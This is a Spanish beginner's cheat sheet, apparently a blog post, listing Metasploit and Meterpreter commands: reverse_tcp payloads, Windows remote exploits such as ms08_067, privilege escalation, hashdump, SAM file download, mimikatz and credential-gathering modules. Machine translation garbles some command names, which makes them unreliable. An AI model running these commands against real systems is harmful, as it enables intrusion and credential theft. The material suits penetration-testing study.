Comandos de MetaSploit y cargas útiles de Meterpreter

Por nhbgm

El marco Metasploit es una de las herramientas más avanzadas y favoritas de los evaluadores de penetración e investigadores de seguridad. Fue desarrollado por HD Moore en lenguaje Perl que posteriormente en 2007 fue revisado en Ruby por completo. Con su gran éxito y demanda en investigadores de seguridad y pen-testers, en 2009, MetaSploit fue adquirida por Rapid7, una conocida empresa de investigación de seguridad. Aprenda los comandos de metasploit más utilizados en esta guía de metasploit para principiantes.

Metasploit es un conjunto de herramientas completo para probadores de penetración y piratas informáticos, ya que viene preempaquetado con todas las herramientas de prueba de penetración para piratear una máquina remota y aplicaciones web. Es una de las herramientas más avanzadas para hackers e investigadores. MetaSploit es un marco muy grande en el que cada uno de sus módulos tiene toneladas de acciones que se pueden realizar. Para que sea más fácil para los nuevos usuarios, hemos enumerado algunos de los comandos de Metasploit más comúnmente utilizados, las cargas útiles de meterpreter que puede practicar y realizar.

MetaSploit para principiantes

Hay tres tipos de comandos de Metasploit.

  1. Comandos básicos (Estos son los comandos de operación muy básicos como buscar, ayuda, información y salir).
  2. Comandos de explotación (Los comandos de explotación son los que se utilizan para verificar todas las opciones de explotación, cargas útiles y objetivos).
  3. Comandos de ejecución de exploits (Estos son comandos posteriores a la explotación que explotan y ejecutan diferentes operaciones en una máquina de destino).

Relacionado: Kali Linux para Android

Todos los más utilizados y Metasploit Básico, Explotar y Ejecución de exploits Los comandos para que los principiantes aprendan son:

  • En primer lugar, para actualizar el marco Metasploit a su última versión. Ejecute el siguiente comando.
apt update; apt install metasploit-framework
  • Para ver todas las opciones de msfconsole y metasploit, use el siguiente comando de ayuda.
msfconsole/help
  • El comando de búsqueda Metasploit se usa para buscar exploits y vulnerabilidades desde msfconsole.
search
  • Para ver una lista de todas las opciones de carga útil para atacar una máquina objetivo.
show options
  • El siguiente comando se usa para verificar y configurar la IP de escucha y el PUERTO de la máquina HOST para configurar una IP estática y el reenvío de puertos a cualquier puerto especificado.
LHOST
LPORT
  • Para ver la lista de todas las cargas útiles para un exploit.
show payloads
  • Para encontrar todos los sistemas operativos vulnerables a un exploit específico.
show targets
  • Para mostrar opciones y comandos avanzados para explotar.
show advanced
  • El comando Mostrar codificadores devuelve todos los codificadores. Codificadores utilizados para evadir firmas IDS/IPS simples que buscan ciertos bytes de su carga útil.
show encoders
  • Este comando dará una lista de generadores de Nop. Se utiliza para cambiar el patrón de un sled de NOP para evitar las firmas IDS/IPS simples de NOP común.
show nops

Comando MetaSploit y cargas útiles de Meterpreter

Carga útil de Windows Reverse Meterpreter

Dominio Descripción
establecer ventanas de carga útil/meterpreter/reverse_tcp Se utiliza para la carga útil de Windows de TCP inverso

Carga útil de Android Meterpreter inverso

Dominio Descripción
establecer carga útil android/meterpreter/reverse_tcp Se utiliza para la carga útil de Android de TCP inverso

Carga útil de Windows VNC Meterpreter

Dominio Descripción
configurar ventanas de carga útil/vncinject/reverse_tcpset ViewOnly falso Se utiliza para la carga útil de VNC de Windows de TCP inverso

Carga útil de Meterpreter inversa de Linux

Dominio Descripción
configurar la carga útil linux/meterpreter/reverse_tcp Utilizado para la carga útil de Linux de TCP inverso

Comandos Meterpreter

Consulte los comandos meterpreter más útiles y comúnmente utilizados.

Dominio Descripción
subir archivo c:\\windows Comando Meterpreter para cargar archivos en una máquina de destino con sistema operativo Windows.
descargar c:\\windows\\reparar\\sam /tmp Comando Meterpreter para descargar archivos desde un dispositivo de destino con sistema operativo Windows.
ejecutar -fc:\\windows\temp\exploit.exe Para ejecutar exploits en una máquina víctima remota.
ejecutar -f cmd -c Para crear un nuevo canal con cmd shell.
PD Muestra todos los procesos de Meterpreter.
cáscara Meterpreter obtiene shell en el objetivo.
obtener sistema Este comando meterpreter intenta la escalada de privilegios en el dispositivo de destino.
volcado de hash Se utiliza para volcar hashes en el sistema de destino.
portfwd agregar –l 3389 –p 3389 –r objetivo Comando Meterpreter para el reenvío de puertos a la máquina víctima.
portfwd delete –l 3389 –p 3389 –r objetivo Meterpreter elimina el reenvío de puertos.

Exploits de MetaSploit

Explore todos los exploits de metasploit más utilizados.

Explotaciones remotas de Windows MetaSploit

Todos los exploits para atacar máquinas con sistema operativo Windows de forma remota.

Dominio Descripción
use exploit/windows/smb/ms08_067_netapi Exploit remoto para máquinas con versiones de Windows MS08_067 Windows 2k, XP, 2003
use exploit/windows/dcerpc/ms06_040_netapi Exploit remoto para máquinas con versiones de Windows MS08_040 Windows NT, 2k, XP, 2003
usar exploit/windows/smb/
ms09_050_smb2_negotiate_func_index
Exploit remoto para máquinas con versiones de Windows MS09_050 Windows Vista SP1/SP2 y Server 2008 (x86)

Módulos Post-Exploit de Windows Metasploit

Dominio Descripción
ejecutar post/windows/gather/win_privs Comando Metasploit para mostrar todos los privilegios y permisos del usuario actual.
usar post/windows/recopilar/credenciales/gpp Este comando Metasploit toma todas las contraseñas guardadas de GPP.
cargar mimikatz -> wdigest Metasplit cargas Mimikatz.
ejecute post/windows/gather/local_admin_search_enum Busca en todas las máquinas con acceso administrativo.

Explotaciones locales de Windows MetaSploit

Exploits para trabajar con una máquina local.

Dominio Descripción
usar exploit/windows/local/bypassuac Se utiliza para la omisión de UAC (Control de cuentas de usuario) en sistemas Windows 7.

Módulos MetaSploit Auxiliares

Dominio Descripción
use auxiliar/escáner/http/dir_scanner Herramienta de escaneo Metasploit utilizada para escanear el directorio HTTP.
use auxiliar/escáner/http/jboss_vulnscan Metasploit JBOSS utilizado para el escaneo de vulnerabilidades.
usar auxiliar/escáner/mssql/mssql_login Herramienta Metasploit Credential Scanner utilizada para MSSQL.
usar auxiliar/escáner/oracle/oracle_login Escáner Metasploit utilizado para el módulo de inicio de sesión de Oracle.

Exploits de Metasploit Powershell

Dominio Descripción
use exploit/multi/script/web_delivery Explotación de entrega de carga útil de shell de Metasploit.
publicar/ventanas/administrar/powershell/exec_powershell Carga el shell para apuntar y ejecutar powershell.
use exploit/multi/http/jboss_maindeployer Implementación de Metasploit JBOSS.
use exploit/windows/mssql/mssql_payload Carga útil MSSQL de Metasploit.

Hay cientos de acciones y comandos más con los que puede jugar, pero estos son los comandos Metasploit más utilizados para controlar una computadora, un teléfono inteligente, aplicaciones web y más. Espero que esta guía de MetaSploit para principiantes te sea útil para aprender a trabajar con MetaSploit.